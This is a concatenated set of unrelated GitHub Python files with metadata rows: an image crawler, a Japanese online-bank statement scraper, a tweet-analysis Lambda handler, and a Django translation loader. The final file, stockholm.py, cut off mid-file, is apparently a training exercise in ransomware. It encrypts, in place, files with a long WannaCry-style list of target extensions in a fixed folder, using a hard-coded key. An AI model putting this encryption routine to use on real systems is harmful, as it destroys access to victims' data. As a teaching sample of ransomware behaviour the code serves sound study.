        self._resize_image(BytesIO(content), outfile=file_name_resize)
        file_name_crop = os.path.join(self.down_path, '裁剪图', file_name)
        self._img_crop(BytesIO(content), output_fullname=file_name_crop)
        self.num += 1

    async def _get_content(self, link, filename=False):
        """Download *link* and hand the bytes to _write_img.

        *filename* is the picture id from the listing API; when falsy, the
        running counter self.num is used instead.
        """
        if link.startswith('//'):
            link = f'https:{link}'
        async with aiohttp.ClientSession() as session:
            async with session.get(url=link) as response:
                content = await response.read()
                extend = link.split('.')[-1]  # extension taken from the URL
                if filename:
                    # BUG FIX: the id passed by the caller was discarded and
                    # every file was written as "(unknown).<ext>", so each
                    # download overwrote the previous one.  Use the real id.
                    filename = f'{filename}.{extend}'
                else:
                    filename = f'{self.num}.{extend}'
                self._write_img(filename, content)

    def run(self, startpage=1, endpage=1):
        """Crawl pages [startpage, endpage] and download every picture.

        endpage=0 means "all pages": the total page count is queried first.
        """
        start = time.time()
        if endpage == 0:
            endpage = self.get_img_links(1, get_total_page=True)
            print(f'总页数:{endpage}')
        for page in range(startpage, endpage + 1):
            picurls = self.get_img_links(page)
            if picurls:
                # Download the whole page concurrently.
                tasks_crop = [asyncio.ensure_future(self._get_content(d['big_path'], d['id'])) for d in picurls]
                loop = asyncio.get_event_loop()
                loop.run_until_complete(asyncio.gather(*tasks_crop, return_exceptions=False))
        end = time.time()
        print(f"共运行了{(end - start):.0f}秒")

    def _resize_image(self, infile, outfile='', minsize=300, is_file=True):
        """Shrink an image so its shorter side is at most *minsize* pixels,
        keeping the aspect ratio.

        infile:  file path / file-like object (is_file=True) or an already
                 opened PIL image (is_file=False)
        outfile: destination path; missing parent directories are created.
                 When empty, infile is reused as the destination (only
                 meaningful when infile is a path).
        """
        im = Image.open(infile) if is_file else infile
        if min(im.size) > minsize:
            x, y = im.size
            if x < y:
                y = int(y * minsize / x)
                x = minsize
            else:
                x = int(x * minsize / y)
                y = minsize
            im = im.resize((x, y), 1)
        if not outfile:
            outfile = infile
        # Create the destination directory when missing.
        ckpath = os.path.dirname(outfile)
        if not os.path.exists(ckpath):
            os.makedirs(ckpath)
        im.save(outfile)

    def _img_crop(self, input_fullname, output_fullname):
        """Crop a square of side (width+height)/4 out of the picture.

        The crop window position depends on the aspect ratio (portrait,
        landscape, roughly square); the result is converted to RGB,
        resized and saved to *output_fullname*.
        """
        img = Image.open(input_fullname)
        width, height = img.size
        ratio = width / height
        side = (((width / 2) + (height / 2)) * 2) / 4  # == (width+height)/4
        x1 = x2 = y1 = y2 = 0
        if 0.7 <= ratio <= 1.4:  # roughly square
            x1 = width * 0.1
            y1 = height - (side + height * 0.1)
            x2 = x1 + side
            y2 = height - (height * 0.1)
        elif ratio < 0.7:  # portrait
            x1 = width * 0.05
            y1 = height - (side + height * 0.02)
            x2 = x1 + side
            y2 = height - (height * 0.02)
        elif ratio > 1.4:  # landscape
            x1 = width * 0.02
            y1 = height * 0.02
            x2 = x1 + side
            y2 = y1 + side
        cropped = img.crop((x1, y1, x2, y2))
        converted = cropped.convert('RGB')
        self._resize_image(converted, outfile=output_fullname, is_file=False)
def main():
    """Crawl every listing page into d:\\download and report the total."""
    spider = Spider(r'd:\download')
    spider.run(startpage=1, endpage=0)  # endpage=0 -> all pages
    print(f'共下载图片:{spider.num}')


if __name__ == '__main__':
    main()
| chenxy2022/long | wow.py | wow.py | py | 7,151 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "os.listdir",
"line_number": 28,
"usage_type": "call"
},
{
"api_name": "os.mkdir",
"line_number": 29,
"usage_type": "call"
},
{
"api_name": "os.path.join",
"line_number": 30,
"usage_type": "call"
},
{
"api_name": "os.path",
"line_number": 30,
... |
8786926229 | from .abstract import Aggregator
from selenium import webdriver
from selenium.webdriver.common.by import By
from selenium.webdriver.common.keys import Keys
from selenium.common.exceptions import NoSuchElementException
from selenium.webdriver.common.action_chains import ActionChains
from selenium.webdriver.support.ui import Select
from bs4 import BeautifulSoup
from accagg.browser import Browser
from time import sleep
import re
from datetime import date
class Aggregator(Aggregator):
    """Account aggregator for SBI Sumishin Net Bank (scrapes the web UI).

    NOTE: the class deliberately shadows the imported abstract ``Aggregator``
    base class; plugin modules are looked up by module name.
    """

    @classmethod
    def bankid(self):
        # Bank id is the last component of the module path ("sbinetbank").
        return self.__module__.split('.')[-1]

    @classmethod
    def description(self):
        return "SBI Sumishin Net Bank"

    @classmethod
    def login_info(self):
        # Credential keys mapped to their on-screen (Japanese) labels.
        return {'USRID': 'ID',
                'PASSWORD': '暗証番号'}

    def __decode_date(self, str):
        # Parse a Japanese "YYYY年MM月DD日" string into a datetime.date.
        # NOTE(review): implicitly returns None for non-matching input.
        match = re.match(r"^(\d+)年(\d+)月(\d+)日$", str)
        if match:
            y = int(match.group(1))
            m = int(match.group(2))
            d = int(match.group(3))
            return date(y, m, d)

    def _decode_amount(self, str):
        # Strip thousands separators and the trailing "円"; return an int.
        # NOTE(review): a string actually starting with '-' would produce
        # "0-123", which int() rejects — callers appear to always pass
        # unsigned amounts and apply the sign via the '出' marker themselves.
        if str[0] != '-':
            str = '0' + str
        return int('0' + str.replace(',', '').replace('円', ''))

    def wait_until_blocked(self, b):
        # Poll (up to ~10 s) until the site's "loadingServer" overlay is gone.
        b.implicitly_wait(0)
        for i in range(1, 20):
            try:
                print('try:%d' % i)
                es = b.find_element_by_class_name('loadingServer')
            except NoSuchElementException:
                # Overlay gone: restore the long implicit wait and return.
                b.implicitly_wait(180)
                return
            sleep(0.5)
        # NOTE(review): the implicit wait is NOT restored when the loop
        # exhausts without the overlay ever disappearing.

    def run(self, login_info, lastdate):
        """Log in and scrape ordinary + yen time-deposit histories newer
        than *lastdate*; return a list of account dicts."""
        URL = "https://www.netbk.co.jp"
        self.__lastdate = lastdate
        browser = Browser.firefox()
        browser.implicitly_wait(180)
        # open URL
        browser.get(URL)
        browser.wait_for_loaded()
        # import pdb; pdb.set_trace()
        # Log in ("ログイン")
        browser.find_element_by_link_text("ログイン").click()
        # enter credentials
        browser.sync_send_keys((By.NAME, 'userName'), login_info['USRID'])
        browser.sync_send_keys((By.CSS_SELECTOR, 'input[type="password"]'), login_info['PASSWORD'])
        # Click login
        browser.find_element_by_css_selector('button[type="submit"]').click()
        browser.wait_for_title_changed()
        while not '住信' in browser.title:
            sleep(0.1)
        if '重要なお知らせ' in browser.title:
            # "Important notice" interstitial: acknowledge by pressing "next".
            browser.wait_element((By.LINK_TEXT, '次へ進む')).click()
            browser.wait_for_loaded()
        # Home screen
        result = []
        # import pdb; pdb.set_trace()
        # Ordinary deposit account(s)
        data = self.__get_ordinary(browser)
        if data:
            result.extend(data)
        # Yen time-deposit account(s)
        data = self.__get_time_deposit(browser)
        if data:
            result.extend(data)
        browser.quit()
        return result

    def __get_ordinary(self, browser):
        # import pdb; pdb.set_trace()
        # Open the deposit/withdrawal statement page ("入出金明細").
        self.wait_until_blocked(browser)
        sleep(0.5)
        e = browser.wait_element((By.LINK_TEXT, "入出金明細"))
        browser.execute_script('arguments[0].click();', e)
        self.wait_until_blocked(browser)
        # Enumerate the entries of the "account name" (口座名) dropdown.
        browser.wait_element((By.CSS_SELECTOR, '[nblabel="口座名"]'))
        num = len(browser.find_elements_by_css_selector('[nblabel="口座名"] li'))
        result = []
        for i in range(0, num):
            # Switch to the i-th account via the dropdown.
            e = browser.find_element_by_css_selector('[nblabel="口座名"]')
            e.click()
            e = e.find_elements_by_css_selector('li')[i]
            subname = e.text
            e.click()
            name = 'ordinary'
            if i > 0:
                # Secondary accounts get the on-screen name as a suffix.
                name = name + '_' + subname
            result.append({
                'name': name,
                'unit': 'Yen',
                'account': '普通',
                'history': self.__get_ordinary_sub(browser),
            })
        # print(result)
        # Back to the home screen.
        self.wait_until_blocked(browser)
        browser.find_element_by_link_text('ホーム').click()
        # wait for display
        browser.wait_for_title_changed()
        browser.wait_for_loaded()
        browser.wait_element((By.LINK_TEXT, 'サイトマップ'))
        return result

    def __get_ordinary_sub(self, browser):
        # Open the sort panel and select "period specified" (期間指定).
        browser.wait_element((By.PARTIAL_LINK_TEXT, '並び替え')).click()
        browser.find_element_by_xpath('//label[contains(text(),"期間指定")]').click()
        # Pick the earliest selectable year/month/day as the period start.
        e = browser.find_elements_by_css_selector('.m-formSelectDate')[0]
        e.find_element_by_css_selector('p.m-select-year nb-simple-select').click()
        e.find_elements_by_css_selector('p.m-select-year li')[1].click()
        e.find_element_by_css_selector('p.m-select-month nb-simple-select').click()
        e.find_elements_by_css_selector('p.m-select-month li')[1].click()
        e.find_element_by_css_selector('p.m-select-day nb-simple-select').click()
        e.find_elements_by_css_selector('p.m-select-day li')[1].click()
        # Apply ("表示" = display).
        browser.find_elements_by_link_text('表示')[1].click()
        # wait for update (the statement-download link appears with results)
        browser.find_elements_by_partial_link_text('明細ダウンロード')
        data = []
        # import pdb; pdb.set_trace()
        while True:
            soup = BeautifulSoup(browser.page_source, "html.parser")
            for row in soup.select('.m-tblDetailsBox'):
                date = self.__decode_date(row.select('.m-date')[0].string)
                if self.__lastdate > date:
                    # Rows are newest-first: anything older than lastdate
                    # ends the whole scan.
                    return data
                desc = row.select('.m-subject span')[0].string
                deposit = self._decode_amount(row.select('.m-txtEx')[0].string)
                if row.select('.m-sign')[0].string == '出':
                    # "出" marks a withdrawal: negate the amount.
                    deposit = -deposit
                balance = self._decode_amount(row.select('.m-txtEx')[1].string)
                item = {'date' : date,
                        'price': 1,
                        'amount' : deposit,
                        'payout' : deposit,
                        'desc' : desc,
                        'balance' : balance
                        }
                # print(item)
                # Prepend.
                # Detail list is sorted by descending order
                # Passbook order is ascending
                data.insert(0, item)
            # Check whether a "previous page" pager link exists.
            browser.implicitly_wait(0)
            es = 0
            try:
                es = browser.find_element_by_css_selector('.m-pager-prev')
                # print(es.get_attribute('outerHTML'))
            except NoSuchElementException:
                # print("no entry")
                break
            if not es:
                break
            browser.implicitly_wait(180)
            next_page = es.text
            es.click()
            # wait for update: the page counter must show the new page number
            while browser.find_element_by_class_name('m-counter').text.split(' ')[0] != next_page:
                sleep(0.1)
        return data

    def __get_time_deposit(self, browser):
        # import pdb; pdb.set_trace()
        browser.implicitly_wait(0)
        es = 0
        try:
            es = browser.find_element_by_link_text('円預金・仕組預金')
        except NoSuchElementException:
            # Menu entry absent: the user has no yen/structured deposits.
            print("no entry")
            return None
        browser.implicitly_wait(180)
        es.click()
        sleep(0.5)
        # Yen time deposit ("円定期預金")
        browser.find_element_by_link_text('円定期預金').click()
        # Transaction history ("取引履歴")
        browser.find_element_by_link_text('取引履歴').click()
        # Enumerate the "account name" (口座名) dropdown entries.
        # browser.wait_element((By.CSS_SELECTOR, '[nblabel="口座名"]'))
        num = len(browser.find_elements_by_css_selector('[nblabel="口座名"] li'))
        result = []
        for i in range(0, num):
            # Switch to the i-th account.
            browser.wait_element((By.PARTIAL_LINK_TEXT, '並び替え')).click()
            e = browser.find_element_by_css_selector('[nblabel="口座名"]')
            e.click()
            e = e.find_elements_by_css_selector('li')[i]
            subname = e.text
            e.click()
            # Sort order (left at the default)
            # e = browser.find_element_by_css_selector('[nblabel="並び順"]')
            # e.click()
            # e = e.find_elements_by_css_selector('li')[1]
            # e.click()
            #
            browser.find_element_by_partial_link_text('表示').click()
            # Wait for the refresh.
            browser.wait_element((By.PARTIAL_LINK_TEXT, '並び替え'))
            name = 'time_deposit'
            if i > 0:
                name = name + '_' + subname
            result.append({
                'name': name,
                'unit': 'Yen',
                'account': '普通',
                'history': self.__get_time_deposit_sub(browser),
            })
        # print(result)
        # Back to the home screen.
        browser.find_element_by_link_text('ホーム').click()
        # wait for display
        browser.wait_for_title_changed()
        browser.wait_for_loaded()
        browser.wait_element((By.LINK_TEXT, 'サイトマップ'))
        return result

    def __get_time_deposit_sub(self, browser):
        data = []
        balance = 0
        # Total number of result pages from a counter such as "1 / 3".
        num = browser.find_element_by_css_selector('p.m-counter').text
        num = int(num.split(' ')[2])
        for i in range(1, num + 1):
            if i != 1:
                # Jump to page i.
                browser.find_element_by_link_text(str(i)).click()
                self.wait_until_blocked(browser)
            soup = BeautifulSoup(browser.page_source, "html.parser")
            for row in soup.select('tr'):
                c = [x for x in row.select('th p')[0].stripped_strings]
                date = self.__decode_date(c[0])
                # if self.__lastdate > date:
                #     break
                desc = ' '.join(c[1:])
                c = [x for x in row.select('td .m-txtEx')[0].stripped_strings]
                deposit = self._decode_amount(c[1])
                if c[0] == '出':
                    # "出" = withdrawal
                    deposit = -deposit
                # Running balance; this listing is processed oldest-first.
                balance += deposit
                item = {'date' : date,
                        'price': 1,
                        'amount' : deposit,
                        'payout' : deposit,
                        'desc' : desc,
                        'balance' : balance
                        }
                # print(item)
                data.append(item)
        return data
| t-bucchi/accagg | accagg/bank/sbinetbank.py | sbinetbank.py | py | 10,622 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "re.match",
"line_number": 34,
"usage_type": "call"
},
{
"api_name": "datetime.date",
"line_number": 39,
"usage_type": "call"
},
{
"api_name": "selenium.common.exceptions.NoSuchElementException",
"line_number": 52,
"usage_type": "name"
},
{
"api_name... |
5106024377 | import re
import json
import base64
import pandas as pd
import networkx as nx
from textblob import TextBlob
from collections import defaultdict
from arabic_reshaper import reshape
from bidi.algorithm import get_display
from requests_toolbelt.multipart import decoder
def generate_hashtag_data(file_path):
    """Count hashtag frequencies over the 'Tweet' column of an Excel file.

    file_path: path, file-like object or raw bytes accepted by
        pandas.read_excel.

    Returns a dict with:
      - "hashtag_frequency": raw hashtag -> occurrence count
      - "reshaped_text": the same counts keyed by the Arabic-reshaped,
        bidi-reordered hashtag (display-ready for charts)
    """
    # Local import keeps this change self-contained.
    from collections import Counter

    df = pd.read_excel(file_path)

    # All hashtags of all tweets, in order of first appearance.
    all_hashtags = []
    for tweet in df['Tweet']:
        all_hashtags.extend(re.findall(r'\#\w+', tweet))

    # Counter replaces the manual dict-based tally; insertion order (first
    # occurrence) is preserved, matching the previous behaviour.
    frequency = dict(Counter(all_hashtags))

    # Same counts keyed by display-ready (reshaped + bidi-reordered) text.
    reshaped_text = {get_display(reshape(k)): v for k, v in frequency.items()}

    return {
        "hashtag_frequency": frequency,
        "reshaped_text": reshaped_text
    }
def generate_sentiment_data(file_path):
    """Compute per-user sentiment series from the tweets in an Excel file.

    Returns one {"user", "indices", "sentiments"} dict per unique user,
    where sentiments are TextBlob polarity scores in tweet order and
    indices run 1..N alongside them.
    """
    df = pd.read_excel(file_path)

    # Collect polarity scores grouped by the tweet's author.
    sentiments = defaultdict(list)
    for _, row in df.iterrows():
        polarity = TextBlob(row['Tweet']).sentiment.polarity
        sentiments[row['User']].append(polarity)

    return [
        {
            "user": user,
            "indices": list(range(1, len(sentiments[user]) + 1)),
            "sentiments": sentiments[user],
        }
        for user in df['User'].unique()
    ]
def generate_user_tweet_counts(file_path):
    """Return [{'User': ..., 'count': ...}] — tweets per user from the Excel file."""
    df = pd.read_excel(file_path)
    counts = df.groupby('User').size().reset_index(name='count')
    return counts.to_dict('records')
def generate_user_mentions_graph_data(file_path):
    """Build a mention graph from the tweets and return its most central part.

    Nodes are @-mentioned usernames; a directed edge links every pair of
    users mentioned together in one tweet.  The returned dict holds the
    nodes and edges of the subgraph induced by the ten users with the
    highest degree centrality, ready for front-end rendering.
    """
    df = pd.read_excel(file_path)

    # First @-mention of each tweet seeds the node set.
    df['username'] = df['Tweet'].str.extract(r'@(\w+)')

    graph = nx.DiGraph()
    graph.add_nodes_from(df['username'].dropna().unique())

    # Connect every ordered pair of users co-mentioned in the same tweet.
    for tweet in df['Tweet']:
        mentions = re.findall(r'@(\w+)', tweet)
        for i, source in enumerate(mentions):
            for target in mentions[i + 1:]:
                graph.add_edge(source, target)

    # Ten most influential users by degree centrality.
    ranked = sorted(nx.degree_centrality(graph).items(),
                    key=lambda item: item[1], reverse=True)
    top_users = [user for user, _ in ranked[:10]]

    subgraph = graph.subgraph(top_users)
    return {
        'nodes': [node for node in subgraph.nodes()],
        'edges': [{'source': s, 'target': t} for s, t in subgraph.edges()],
    }
def generate_map_data(file_path):
    """Extract {'lat', 'lon'} pairs from the 'coordinates' column.

    Rows without coordinates are dropped.  The column is expected to hold
    strings shaped like "...=<lon>,...=<lat>)"; the final character of the
    latitude token (the closing parenthesis) is stripped before parsing.
    """
    data = pd.read_excel(file_path)
    data = data[data['coordinates'].notna()]

    coords_list = []
    for _, row in data.iterrows():
        lon_token, lat_token = row['coordinates'].split(',')[0], row['coordinates'].split(',')[1]
        lon = float(lon_token.split('=')[1])
        lat = float(lat_token.split('=')[1][:-1])
        coords_list.append({'lat': lat, 'lon': lon})
    return coords_list
# Permissive CORS headers attached to every Lambda response.
headers = {
    "Access-Control-Allow-Origin": "*",  # Adjust the value according to your needs
    "Access-Control-Allow-Headers": "Content-Type,X-Amz-Date,Authorization,X-Api-Key",
    "Access-Control-Allow-Methods": "OPTIONS,GET,POST,PUT,PATCH,DELETE",
    "Access-Control-Allow-Credentials": "true",
}
def handler(event, context):
    """AWS Lambda entry point.

    Expects a base64-encoded multipart/form-data body whose first part is
    an Excel file of tweets; runs every analysis on it and returns them as
    one JSON payload with CORS headers attached.
    """
    # decode the multipart form data
    decoded_str = base64.b64decode(event["body"])
    content_type_header = event["headers"]["content-type"]
    multipart_data = decoder.MultipartDecoder(
        decoded_str, content_type_header)
    # the uploaded Excel file is the first (and only expected) part
    file = multipart_data.parts[0]
    # log the original file name for tracing
    print(file.headers[b'Content-Disposition'].decode().split(';')[1])
    # Each generator receives the raw bytes of the part; presumably
    # pandas.read_excel accepts them directly — TODO confirm with the
    # pinned pandas version.
    hashtag_data = generate_hashtag_data(file.content)
    sentiment_data = generate_sentiment_data(file.content)
    user_tweet_counts = generate_user_tweet_counts(file.content)
    user_mentions_graph_data = generate_user_mentions_graph_data(file.content)
    map_data = generate_map_data(file.content)
    # return the response
    return {
        "statusCode": 200,
        "headers": headers,
        "body": json.dumps({
            "hashtag_data": hashtag_data,
            "sentiment_data": sentiment_data,
            "user_tweet_counts": user_tweet_counts,
            "user_mentions_graph_data": user_mentions_graph_data,
            "map_data": map_data
        })
    }
| kashif-ghafoor/twitter-scrap-infa | src/hashtagAnalysis/index.py | index.py | py | 6,609 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "pandas.read_excel",
"line_number": 15,
"usage_type": "call"
},
{
"api_name": "re.findall",
"line_number": 19,
"usage_type": "call"
},
{
"api_name": "arabic_reshaper.reshape",
"line_number": 39,
"usage_type": "call"
},
{
"api_name": "bidi.algorithm.g... |
18935365420 | # pylint: disable=too-many-locals, duplicate-code
"""Management command that loads locale .po files into database."""
from __future__ import unicode_literals
import json
from os.path import join, isdir
from django.conf import settings
from django.core.management.base import BaseCommand as LoadCommand, CommandError
from django.apps import apps
from babel.messages.pofile import read_po
def setattr_by_json_path(json_object, path, value):
    """Recursively set a string leaf inside *json_object* addressed by *path*.

    Path grammar: "#<id>" selects the element of a list whose "id" field
    equals <id>; "/<key>" selects a dict entry.  When the addressed value
    is a string it is replaced with *value*; otherwise descent continues
    with the remainder of the path.  Unknown keys/ids (and list elements
    without an "id") are silently ignored.  Returns the mutated top-level
    object.
    """
    # Position of the next separator after the leading one; when none
    # exists, cut past the end so the remainder becomes "".
    cuts = [pos for pos in (path.find("#", 1), path.find("/", 1)) if pos > 0]
    cut = min(cuts) if cuts else len(path) + 1
    token, remainder = path[1:cut], path[cut:]

    if path[0] == "#" and isinstance(json_object, list):
        for element in json_object:
            try:
                if element["id"] == token:
                    setattr_by_json_path(element, remainder, value)
            except KeyError:
                pass
    elif path[0] == "/" and isinstance(json_object, dict):
        try:
            child = json_object[token]
        except KeyError:
            pass
        else:
            if isinstance(child, str):
                json_object[token] = value
            else:
                setattr_by_json_path(child, remainder, value)
    return json_object
class Command(LoadCommand):
    """Management command that loads locale .po files into database."""

    def handle(self, *args, **options):
        """Read nav.po for every non-English language and write the
        translated strings back onto the referenced model fields.

        Each po message carries auto-comments shaped like
        "app.Model.pk.field.json_path" identifying the target: a plain
        field is set directly; a JSON field is patched in place via
        setattr_by_json_path and re-serialized.

        Raises CommandError when the locale directory or a language
        sub-directory is missing.
        """
        po_filename = "nav.po"
        locale_path = settings.MODELTRANSLATION_LOCALE_PATH
        if not isdir(locale_path):
            raise CommandError("Locale directory does not exists.")
        for lang in [lang_tup[0] for lang_tup in list(settings.LANGUAGES)]:
            if lang == "en":
                continue  # English is the source language; nothing to load
            lang_path = join(locale_path, lang)
            if not isdir(lang_path):
                raise CommandError("Language directory does not exists.")
            # Context manager guarantees the handle is closed even when
            # read_po raises (the original leaked it on error).
            with open(join(lang_path, "LC_MESSAGES", po_filename), "r", encoding="utf-8") as po_file:
                catalog = read_po(po_file)
            for message in catalog:
                if message.string in (None, "None", "") or not message.auto_comments:
                    continue
                for field_id in message.auto_comments:
                    [app, class_name, primary_key, field, json_path] = field_id.split('.')
                    model = apps.get_model(app, class_name)
                    try:
                        obj = model.objects.get(pk=primary_key)
                    except model.DoesNotExist:
                        continue
                    if json_path == "":
                        # Plain translatable field: assign directly.
                        setattr(obj, field, message.string)
                    else:
                        # JSON field: retarget the "_en" path suffix at the
                        # current language and patch the raw document.
                        msg_data = getattr(obj, field).raw_data
                        tr_json_path = "%s_%s" % (json_path[:-3], lang)
                        msg_data = setattr_by_json_path(msg_data, tr_json_path, message.string)
                        setattr(obj, field, json.dumps(msg_data))
                    obj.save()
| IATI/IATI-Standard-Website | modeltranslation_sync/management/commands/load_trans_nav.py | load_trans_nav.py | py | 3,582 | python | en | code | 5 | github-code | 36 | [
{
"api_name": "django.core.management.base.BaseCommand",
"line_number": 47,
"usage_type": "name"
},
{
"api_name": "django.conf.settings.MODELTRANSLATION_LOCALE_PATH",
"line_number": 53,
"usage_type": "attribute"
},
{
"api_name": "django.conf.settings",
"line_number": 53,
... |
44638762028 | # **************************************************************************** #
# #
# ::: :::::::: #
# stockholm.py :+: :+: :+: #
# +:+ +:+ +:+ #
# By: mariza <mariza@student.42.fr> +#+ +:+ +#+ #
# +#+#+#+#+#+ +#+ #
# Created: 2023/05/10 09:46:33 by mariza #+# #+# #
# Updated: 2023/05/30 09:56:06 by mariza ### ########.fr #
# #
# **************************************************************************** #
import argparse
import os
import os.path
from cryptography.fernet import Fernet
# Directory that gets "infected" (encrypted) and the hard-coded Fernet key.
# NOTE: embedding a key in source is only acceptable because this is an
# educational ransomware-simulation exercise.
RUTA = '/Users/mariza/Desktop/repo-terminados-bootcamp/stockholm/home/infection'
KEY = 'PyMEtpcBTPNHI7y_wlN1dHK_K_NElzbGeYT92ksziJo='

# Command-line interface: -v version, -r <key> reverse (decrypt),
# -s silent, -f <dir> output directory for decrypted files.
parser = argparse.ArgumentParser()
parser.add_argument ('-v', '--version', dest = 'v', action = 'store_true', help = 'muestra la version del programa')
parser.add_argument ('-r', '--reverse', dest = 'r', type = str , help = 'revierte la infeccion')
parser.add_argument ('-s', '--silent', dest = 's', action = "store_true", help = 'hace la infeccion sin hacer ningun output')
parser.add_argument ('-f', type = str, default = RUTA, help = 'manda los archivos a una carpeta especifica')
args = parser.parse_args()
def new_ext(ruta):
    """Append the '.ft' suffix to every regular file in *ruta* whose
    extension is on the target list (WannaCry-style extension set)."""
    ext = (".der", ".pfx", ".key", ".crt", ".csr", ".p12", ".pem", ".odt",
           ".ott", ".sxw", ".stw", ".uot", ".3ds", ".max", ".3dm", ".ods",
           ".ots", ".sxc", ".stc", ".dif", ".slk", ".wb2", ".odp", ".otp",
           ".sxd", ".std", ".uop", ".odg", ".otg", ".sxm", ".mml", ".lay",
           ".lay6", ".asc", ".sqlite3", ".sqlitedb", ".sql", ".accdb",
           ".mdb", ".db", ".dbf", ".odb", ".frm", ".myd", ".myi", ".ibd",
           ".mdf", ".ldf", ".sln", ".suo", ".cs", ".c", ".cpp", ".pas", ".h",
           ".asm", ".js", ".cmd", ".bat", ".ps1", ".vbs", ".vb", ".pl",
           ".dip", ".dch", ".sch", ".brd", ".jsp", ".php", ".asp", ".rb",
           ".java", ".jar", ".class", ".sh", ".mp3", ".wav", ".swf", ".fla",
           ".wmv", ".mpg", ".vob", ".mpeg", ".asf", ".avi", ".mov", ".mp4",
           ".3gp", ".mkv", ".3g2", ".flv", ".wma", ".mid", ".m3u", ".m4u",
           ".djvu", ".svg", ".ai", ".psd", ".nef", ".tiff", ".tif", ".cgm",
           ".raw", ".gif", ".png", ".bmp", ".jpg", ".jpeg", ".vcd", ".iso",
           ".backup", ".zip", ".rar", ".7z", ".gz", ".tgz", ".tar", ".bak",
           ".tbk", ".bz2", ".PAQ", ".ARC", ".aes", ".gpg", ".vmx", ".vmdk",
           ".vdi", ".sldm", ".sldx", ".sti", ".sxi", ".602", ".hwp", ".snt",
           ".onetoc2", ".dwg", ".pdf", ".wk1", ".wks", ".123", ".rtf", ".csv",
           ".txt", ".vsdx", ".vsd", ".edb", ".eml", ".msg", ".ost", ".pst",
           ".potm", ".potx", ".ppam", ".ppsx", ".ppsm", ".pps", ".pot", ".pptm",
           ".pptx", ".ppt", ".xltm", ".xltx", ".xlc", ".xlm", ".xlt", ".xlw",
           ".xlsb", ".xlsm", ".xlsx", ".xls", ".dotx", ".dotm", ".dot", ".docm",
           ".docb", ".docx", ".doc")
    for entry in os.listdir(ruta):
        src = os.path.join(ruta, entry)
        # Skip directories and files with an untargeted extension.
        if not os.path.isfile(src):
            continue
        if os.path.splitext(entry)[1] not in ext:
            continue
        os.rename(src, os.path.join(ruta, entry + '.ft'))
##encripto los archivos de la carpetab
def wannacry(silent=False):
    """Encrypt every file in RUTA whose extension is on the target list,
    overwriting it in place with its Fernet ciphertext.

    silent: suppress the per-file progress messages.
    """
    fernet = Fernet(KEY)
    ext = (".der", ".pfx", ".key", ".crt", ".csr", ".p12", ".pem", ".odt",
           ".ott", ".sxw", ".stw", ".uot", ".3ds", ".max", ".3dm", ".ods",
           ".ots", ".sxc", ".stc", ".dif", ".slk", ".wb2", ".odp", ".otp",
           ".sxd", ".std", ".uop", ".odg", ".otg", ".sxm", ".mml", ".lay",
           ".lay6", ".asc", ".sqlite3", ".sqlitedb", ".sql", ".accdb",
           ".mdb", ".db", ".dbf", ".odb", ".frm", ".myd", ".myi", ".ibd",
           ".mdf", ".ldf", ".sln", ".suo", ".cs", ".c", ".cpp", ".pas", ".h",
           ".asm", ".js", ".cmd", ".bat", ".ps1", ".vbs", ".vb", ".pl",
           ".dip", ".dch", ".sch", ".brd", ".jsp", ".php", ".asp", ".rb",
           ".java", ".jar", ".class", ".sh", ".mp3", ".wav", ".swf", ".fla",
           ".wmv", ".mpg", ".vob", ".mpeg", ".asf", ".avi", ".mov", ".mp4",
           ".3gp", ".mkv", ".3g2", ".flv", ".wma", ".mid", ".m3u", ".m4u",
           ".djvu", ".svg", ".ai", ".psd", ".nef", ".tiff", ".tif", ".cgm",
           ".raw", ".gif", ".png", ".bmp", ".jpg", ".jpeg", ".vcd", ".iso",
           ".backup", ".zip", ".rar", ".7z", ".gz", ".tgz", ".tar", ".bak",
           ".tbk", ".bz2", ".PAQ", ".ARC", ".aes", ".gpg", ".vmx", ".vmdk",
           ".vdi", ".sldm", ".sldx", ".sti", ".sxi", ".602", ".hwp", ".snt",
           ".onetoc2", ".dwg", ".pdf", ".wk1", ".wks", ".123", ".rtf", ".csv",
           ".txt", ".vsdx", ".vsd", ".edb", ".eml", ".msg", ".ost", ".pst",
           ".potm", ".potx", ".ppam", ".ppsx", ".ppsm", ".pps", ".pot", ".pptm",
           ".pptx", ".ppt", ".xltm", ".xltx", ".xlc", ".xlm", ".xlt", ".xlw",
           ".xlsb", ".xlsm", ".xlsx", ".xls", ".dotx", ".dotm", ".dot", ".docm",
           ".docb", ".docx", ".doc")
    try:
        entries = os.listdir(RUTA)
    except OSError:
        # Target directory missing/unreadable.  Narrowed from a bare
        # `except:` that silently absorbed every error in the loop too.
        print('La carpeta home no existe.')
        return
    for x in entries:
        # Skip untargeted files *before* reading them (the original read
        # every file into memory regardless of its extension).
        if os.path.splitext(x)[1] not in ext:
            continue
        path = os.path.join(RUTA, x)
        with open(path, 'rb') as f:
            datos = f.read()
        with open(path, 'wb') as f:
            f.write(fernet.encrypt(datos))
        if not silent:
            print(f'El archivo {x} ha sido encriptado')
    # new_ext(RUTA)
##desencripto los archivos de la carpeta que tengan la extension .ft
def desencriptado_archivos(key, file, silent=False):
    """Decrypt every '*.ft' file in RUTA into directory *file* using *key*.

    key:    Fernet key (base64-encoded string/bytes)
    file:   output directory, created when missing
    silent: suppress the per-file progress messages
    """
    try:
        if not os.path.exists(file):
            os.makedirs(file)
        fernet = Fernet(key)
        for x in os.listdir(RUTA):
            if not x.endswith('.ft'):
                continue
            with open(os.path.join(RUTA, x), 'rb') as f:
                datos_archivo = f.read()
            descifrado = fernet.decrypt(datos_archivo)
            # Drop the trailing '.ft' to restore the original file name.
            with open(os.path.splitext(os.path.join(file, x))[0], 'wb') as f:
                f.write(descifrado)
            if not silent:
                print(f'El archivo {x} ha sido desencriptado')
    except Exception:
        # Wrong key, unreadable file, etc.  Narrowed from a bare `except:`
        # which also swallowed KeyboardInterrupt/SystemExit.
        print('La clave introducida no es válida')
if __name__ == '__main__':
    # CLI dispatch: -r <key> reverses the infection (decrypts), -v prints
    # the version; with no flag the target directory is encrypted.
    if args.r:
        desencriptado_archivos(args.r, args.f, args.s)
    elif args.v:
        print('version 1.0')
    else:
        wannacry(args.s)
| Mankestark/Proyectos-terminados-bootcamp-ciberseguridad | stockholm/stockholm.py | stockholm.py | py | 7,398 | python | uk | code | 0 | github-code | 36 | [
{
"api_name": "argparse.ArgumentParser",
"line_number": 22,
"usage_type": "call"
},
{
"api_name": "os.listdir",
"line_number": 54,
"usage_type": "call"
},
{
"api_name": "os.path.join",
